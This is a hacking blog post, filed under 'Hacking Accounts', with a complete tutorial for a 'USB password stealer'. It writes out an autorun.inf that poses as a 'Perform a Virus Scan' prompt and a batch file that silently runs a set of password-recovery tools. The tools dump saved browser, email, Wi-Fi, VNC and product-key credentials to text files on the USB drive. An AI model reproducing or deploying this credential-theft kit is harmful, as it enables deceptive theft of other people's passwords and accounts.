Pages

Showing posts with label Hacking Accounts. Show all posts
Showing posts with label Hacking Accounts. Show all posts

USB Password Stealer


As we know, windows stores most of its passwords on daily basis, such as Msn messenger passwords,Yahoo passwords, Myspace passwords etc. Most of people have lack of time and they had just asked their Browser/windows to save their passwords. As we know,  there are many tools to recover Saved passwords, so in this article i will explain you on how to make a USB password stealer.


Things you will need:

Download all together

Steps:

  1. Open notepad/wordpad and type:
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
    save this as AUTORUN.inf
  2. Open a new notepad/wordpad document and type:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start PasswordFox.exe /stext passwordfox.txt
    start OperaPassView.exe /stext OperaPassView.txt
    start ChromePass.exe /stext ChromePass.txt
    start Dialupass.exe /stext Dialupass.txt
    start netpass.exe /stext netpass.txt
    start WirelessKeyView.exe /stext WirelessKeyView.txt
    start BulletsPassView.exe /stext BulletsPassView.txt
    start VNCPassView.exe /stext VNCPassView.txt
    start ProduKey.exe /stext ProduKey.txt
    save this as LAUNCH.bat
  3. Copy the autorun and launch file to your USB
  4. Download the programs named in the beggining of the tutorial
  5. Extract the files you downloaded to your desktop and copy all the .exe files to your USB
  6. Remove and re-insert your USB
  7. Click on the option perform a virus scan
    (this is an example, you can change it to whatever you like)
  8. Go to my computer --> USB DRIVE and open it
You will now see some text files, if you open them you will see usernames and passwords

NOTICE:  This only recovers passwords that have once been saved on your computer. The option "Perform a virus scan" will not work on Windows Vista/7/8, you will have to open your USB Flash Drive and execute either the autorun or the launch file. If you have a little knowledge about this type of code, you can edit it to execute only the files you want.